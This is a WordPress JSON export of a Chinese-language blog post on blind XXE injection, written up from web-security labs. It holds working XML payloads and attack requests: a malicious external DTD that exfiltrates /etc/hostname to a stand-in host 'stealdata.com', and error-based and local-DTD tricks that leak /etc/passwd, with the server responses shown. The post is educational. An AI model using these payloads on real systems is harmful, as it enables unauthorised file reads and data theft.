{"id":1200,"date":"2023-02-05T21:50:00","date_gmt":"2023-02-05T13:50:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1200"},"modified":"2024-02-17T20:19:53","modified_gmt":"2024-02-17T12:19:53","slug":"xxe-blind","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1200","title":{"rendered":"XXE blind"},"content":{"rendered":"\n<p>XXE\u76f8\u95dc\u4ecb\u7d39\u5982\u4e0b<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-wp-embed\"><div class=\"wp-block-embed__wrapper\">\n<blockquote class=\"wp-embedded-content\" data-secret=\"EFPYOYf9JV\"><a href=\"https:\/\/systw.net\/note\/archives\/1193\">XXE<\/a><\/blockquote><iframe loading=\"lazy\" class=\"wp-embedded-content\" sandbox=\"allow-scripts\" security=\"restricted\" style=\"position: absolute; clip: rect(1px, 1px, 1px, 1px);\" title=\"XXE &#8212; \u725b\u7684\u5927\u8166\" src=\"https:\/\/systw.net\/note\/archives\/1193\/embed#?secret=Bgp3gnVc5W#?secret=EFPYOYf9JV\" data-secret=\"EFPYOYf9JV\" width=\"600\" height=\"338\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>\u7576\u61c9\u7528\u7a0b\u5f0f\u53d7\u5230XXE\u6ce8\u5165\u4f46\u5728\u56de\u61c9\u4e2d\u6c92\u6709\u4efb\u4f55\u653b\u64ca\u7d50\u679c\u6642\uff0c\u5f88\u96e3\u77e5\u9053\u662f\u5426\u6709XXE\u6f0f\u6d1e\u3002\u56e0\u6b64\u9700\u8981\u900f\u904e\u4e00\u4e9b\u76f2\u6ce8\u7684\u65b9\u6cd5\u53bb\u5224\u65b7\uff0c\u5e38\u898b\u7684\u5075\u6e2c\u65b9\u6cd5\u6709\u5169\u7a2e<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f7f\u7528OAST\u6280\u8853\u5075\u6e2c<\/li>\n\n\n\n<li>\u4f7f\u7528\u53c3\u6578\u5be6\u9ad4\u5075\u6e2c<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528OAST\u6280\u8853\u5075\u6e2c<\/h2>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u8981\u6c42XXE\u8b93\u4f3a\u670d\u5668\u5411outside web\u767c\u51faHTTP\u8acb\u6c42\u3002\u653b\u64ca\u8005\u53ef\u4ee5\u76e3\u8996DNS\u4e26\u67e5\u627eHTTP \u8acb\u6c42\uff0c\u5f9e\u800c\u5075\u6e2cXXE\u653b\u64ca\u662f\u5426\u6210\u529f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE stockCheck &#91; &lt;!ENTITY xxe SYSTEM \"http:\/\/outside web\"&gt; ]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;&amp;xxe;&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 20\n\"Invalid product ID\"<\/code><\/pre>\n\n\n\n<p>Lab: Blind XXE with out-of-band interaction<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528\u53c3\u6578\u5be6\u9ad4\u5075\u6e2c<\/h2>\n\n\n\n<p>\u7531\u65bc\u61c9\u7528\u7a0b\u5f0f\u7684\u8f38\u5165\u9a57\u8b49\uff0c\u4f7f\u5f97\u4e00\u822c\u7684XXE\u653b\u64ca\u88ab\u963b\u6b62\uff0c\u5728\u9019\u7a2e\u60c5\u6cc1\u4e0b\uff0c\u53ef\u4ee5\u5617\u8a66\u4f7f\u7528 <code>XML parameter entities<\/code>\u53c3\u6578\u5be6\u9ad4\u3002\u9019\u662f\u4e00\u7a2e\u7279\u6b8a\u985e\u578b\u7684 XML \u5be6\u9ad4\uff0c\u53ea\u80fd\u5728DTD\u4e2d\u7684\u5176\u4ed6\u4f4d\u7f6e\u5f15\u7528\uff0c\u7528\u6cd5\u662f\u5728\u5be6\u9ad4\u540d\u7a31\u4e4b\u524d\u52a0\u5165<code>%<\/code>\uff0c\u5982\u4e0b<\/p>\n\n\n\n<p><code>&lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM \"http:\/\/outsiteweb\"&gt; %xxe; ]&gt;<\/code><\/p>\n\n\n\n<p>\u8209\u4f8b\u5982\u4e0b\uff0c\u8981\u6c42XXE\u8b93\u4f3a\u670d\u5668\u5411outside web\u767c\u51faHTTP\u8acb\u6c42\uff0c\u5f9e\u800c\u5075\u6e2cXXE\u653b\u64ca\u662f\u5426\u6210\u529f\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE stockCheck &#91;&lt;!ENTITY % xxe SYSTEM \"http:\/\/outside web\"&gt; %xxe; ]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;9&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\nContent-Type: application\/json; charset=utf-8\nConnection: close\nContent-Length: 15\n\"Parsing error\"<\/code><\/pre>\n\n\n\n<p>Lab: Blind XXE with out-of-band interaction via XML parameter entities<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>\u78ba\u5b9a\u6709XXE\u6f0f\u6d1e\u5f8c\uff0c\u53ef\u4ee5\u4f7f\u7528\u4ee5\u4e0b\u5e7e\u7a2e\u76f2\u6ce8\u6280\u5de7\uff0c\u53d6\u5f97\u6578\u64da<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5229\u7528\u5916\u90e8DTD\u53d6\u5f97\u6578\u64da<\/li>\n\n\n\n<li>\u900f\u904e\u932f\u8aa4\u8a0a\u606f\u6aa2\u7d22\u6578\u64da<\/li>\n\n\n\n<li>\u5229\u7528\u5167\u90e8DTD\u53d6\u5f97\u6578\u64da<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p> <\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528\u5916\u90e8DTD\u53d6\u5f97\u6578\u64da<\/h2>\n\n\n\n<p>\u65b9\u6cd5\u5982\u4e0b\uff0c\u5148\u6e96\u5099\u4e00\u500b\u62ff\u53d6\u6578\u64da\u7684\u7db2\u5740<code>https:\/\/stealdata.com<\/code>\uff0c\u5728\u6e96\u5099\u4e00\u500bDTD\u7db2\u5740<code>https:\/\/dtd.website\/malicious.dtd<\/code>\uff0c\u5167\u5bb9\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"file:\/\/\/etc\/hostname\"&gt;\n&lt;!ENTITY % eval \"&lt;!ENTITY &amp;#x25; exfil SYSTEM 'https:\/\/stealdata.com\/?x=%file;'&gt;\"&gt;\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\n<p>\u4ee5\u4e0a\u5167\u5bb9\u8aaa\u660e\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5b9a\u7fa9\u4e00\u500b\u540d\u70baXML \u53c3\u6578\u5be6\u9ad4<code>file<\/code>\uff0c\u5305\u542b\u6a94\u6848\u7684\u5167\u5bb9<code>\/etc\/hostname<\/code>\u3002<\/li>\n\n\n\n<li>\u5b9a\u7fa9\u4e00\u500b\u53c3\u6578\u5be6\u9ad4<code>eval<\/code>\uff0c\u5305\u542b\u53e6\u4e00\u500b\u53c3\u6578\u5be6\u9ad4\u7684\u52d5\u614b\u5ba3\u544a<code>exfil<\/code>\uff0c\u5176\u4e2durl\u5305\u542b\u525b\u525b\u5b9a\u7fa9\u7684<code>file<\/code><\/li>\n\n\n\n<li>\u4f7f\u7528%eval;\u8b93exfil \u53ef\u4ee5\u57f7\u884c\uff0c\u63a5\u8457\u4f7f\u7528%exfil;\u8b93url\u53ef\u4ee5\u904b\u4f5c<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>\u63a5\u8457\u5728\u8acb\u6c42\u4e2d\u628a\u525b\u525bDTD\u7db2\u5740\u4f4d\u7f6e\u653e\u5165XXE\u4e2d\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE foo &#91;&lt;!ENTITY % xxe SYSTEM \"https:\/\/dtd.website\/malicious.dtd\"&gt; %xxe;]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"Parsing error\"<\/code><\/pre>\n\n\n\n<p>\u4e00\u65e6\u653b\u64ca\u6210\u529f\uff0c\u670d\u52d9\u5668\u5c31\u6703\u5c07\/etc\/hostname\u5167\u5bb9\u9001\u5230<code>https:\/\/stealdata.com<\/code>\uff0c\u53ea\u8981\u67e5\u770b\u65e5\u5fd7\u5c31\u6703\u770b\u5230\u985e\u4f3c\u4ee5\u4e0b\u4fe1\u606f\uff0c<code>a2dd82d1b9eb<\/code>\u70ba\/etc\/hostname\u7684\u5167\u5bb9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><code>GET \/?x=a2dd82d1b9eb HTTP\/1.1<\/code><\/code><\/pre>\n\n\n\n<p>Lab: Exploiting blind XXE to exfiltrate data using a malicious external DTD<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u900f\u904e\u932f\u8aa4\u8a0a\u606f\u6aa2\u7d22\u6578\u64da<\/h2>\n\n\n\n<p>\u5982\u679c\u61c9\u7528\u7a0b\u5f0f\u6703\u5728\u56de\u61c9\u4e2d\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u53ef\u4f7f\u7528\u60e1\u610f\u5916\u90e8DTD\u89f8\u767c\u5305\u542b\u6a94\u6848\u5167\u5bb9\u7684XML\u89e3\u6790\u932f\u8aa4\u8a0a\u606f\u3002<\/p>\n\n\n\n<p>\u65b9\u6cd5\u5982\u4e0b\uff0c\u6e96\u5099\u4e00\u500bDTD\u7db2\u5740<code>https:\/\/dtd.website\/malicious.dtd<\/code>\uff0c\u5167\u5bb9\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;!ENTITY % file SYSTEM \"file:\/\/\/etc\/passwd\"&gt;\n&lt;!ENTITY % eval \"&lt;!ENTITY &amp;#x25; exfil SYSTEM 'file:\/\/\/invalid\/%file;'&gt;\"\n%eval;\n%exfil;<\/code><\/pre>\n\n\n\n<p>\u4e0a\u8ff0\u5167\u5bb9\u548c\u525b\u525b\u7684\u5dee\u4e0d\u591a\uff0c\u552f\u4e00\u4e0d\u540c\u7684\u662f\u7b2c\u4e8c\u884c\u8981\u6307\u5b9a\u4e00\u500b\u4e0d\u5b58\u5728\u7684\u6a94\u6848<\/p>\n\n\n\n<p>\u63a5\u8457\u5728\u8acb\u6c42\u4e2d\u628a\u525b\u525bDTD\u7db2\u5740\u4f4d\u7f6e\u653e\u5165XXE\u4e2d\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE foo &#91;&lt;!ENTITY % xxe SYSTEM \"https:\/\/dtd.website\/malicious.dtd\"&gt; %xxe;]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"XML parser exited with non-zero code 1: \/invalid\/root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n...omit...<\/code><\/pre>\n\n\n\n<p>\u547c\u53eb\u60e1\u610f\u5916\u90e8DTD\u5c07\u5c0e\u81f4\u8fd4\u56de\u932f\u8aa4\u8a0a\u606f\uff0c\u4e26\u986f\u793a\/etc\/passwd\u5167\u5bb9<\/p>\n\n\n\n<p>Lab: Exploiting blind XXE to retrieve data via error messages<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528\u5167\u90e8DTD\u53d6\u5f97\u6578\u64da<\/h2>\n\n\n\n<p>\u5982\u679c\u6587\u4ef6\u7684DTD\u4f7f\u7528\u5167\u90e8\u548c\u5916\u90e8DTD\u8072\u660e\u7684\u6df7\u5408\uff0c\u5247\u5167\u90e8DTD\u53ef\u4ee5\u91cd\u65b0\u5b9a\u7fa9\u5728\u5916\u90e8DTD\u4e2d\u8072\u660e\u7684\u5be6\u9ad4\u3002\u767c\u751f\u9019\u7a2e\u60c5\u6cc1\u6642\uff0c\u5728\u53e6\u4e00\u500b\u53c3\u6578\u5be6\u9ad4\u7684\u5b9a\u7fa9\u4e2d\u4f7f\u7528XML\u53c3\u6578\u5be6\u9ad4\u7684\u9650\u5236\u5c31\u6703\u653e\u5bec\u3002\u9019\u610f\u5473\u8457\u653b\u64ca\u8005\u53ef\u4ee5\u5728\u5167\u90e8DTD\u4e2d\u4f7f\u7528\u57fa\u65bc\u932f\u8aa4\u7684XXE\u6280\u8853<\/p>\n\n\n\n<p>\u4f8b\u5982\uff0c\u5047\u8a2d\u4f3a\u670d\u5668\u6a94\u6848\u7cfb\u7d71\u4e0a\u7684\u4f4d\u7f6e\u6709\u4e00\u500bDTD\u6587\u4ef6<code>\/usr\/share\/yelp\/dtd\/docbookx.dtd<\/code>\uff0c\u4e26\u4e14\u8a72DTD\u6587\u4ef6\u5b9a\u7fa9\u4e86\u4e00\u500b\u540d\u70ba<code>ISOamso<\/code>\u7684\u5be6\u9ad4\uff0c\u5982\u679c\u653b\u64ca\u8005\u5982\u679c\u60f3\u770b\/etc\/passwd\uff0c\u53ef\u4ee5\u6df7\u5408\u5176\u5167\u5bb9\u4e26\u89f8\u767c&nbsp;XML \u89e3\u6790\u932f\u8aa4\u8a0a\u606f\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>################## attack request ################## \nPOST \/product\/stock HTTP\/1.1\n...omit...\n&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;\n&lt;!DOCTYPE message &#91;\n&lt;!ENTITY % local_dtd SYSTEM \"file:\/\/\/usr\/share\/yelp\/dtd\/docbookx.dtd\"&gt;\n&lt;!ENTITY % ISOamso '\n&lt;!ENTITY &amp;#x25; file SYSTEM \"file:\/\/\/etc\/passwd\"&gt;\n&lt;!ENTITY &amp;#x25; eval \"&lt;!ENTITY &amp;#x26;#x25; error SYSTEM &amp;#x27;file:\/\/\/nonexistent\/&amp;#x25;file;&amp;#x27;&gt;\"&gt;\n&amp;#x25;eval;\n&amp;#x25;error;\n'&gt;\n%local_dtd;\n]&gt;\n&lt;stockCheck&gt;&lt;productId&gt;1&lt;\/productId&gt;&lt;storeId&gt;1&lt;\/storeId&gt;&lt;\/stockCheck&gt;\n\n################## attack response ################## \nHTTP\/1.1 400 Bad Request\n...omit...\n\"XML parser exited with non-zero code 1: \/nonexistent\/root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin<\/code><\/pre>\n\n\n\n<p>Lab: Exploiting XXE to retrieve data by repurposing a local DTD<\/p>\n","protected":false},"excerpt":{"rendered":"<p>XXE\u76f8\u95dc\u4ecb\u7d39\u5982\u4e0b \u7576\u61c9\u7528\u7a0b\u5f0f\u53d7\u5230XXE\u6ce8\u5165\u4f46\u5728\u56de\u61c9\u4e2d\u6c92\u6709\u4efb &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[38],"tags":[],"class_list":["post-1200","post","type-post","status-publish","format-standard","hentry","category-serverside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1200","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1200"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1200\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1200"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1200"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1200"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}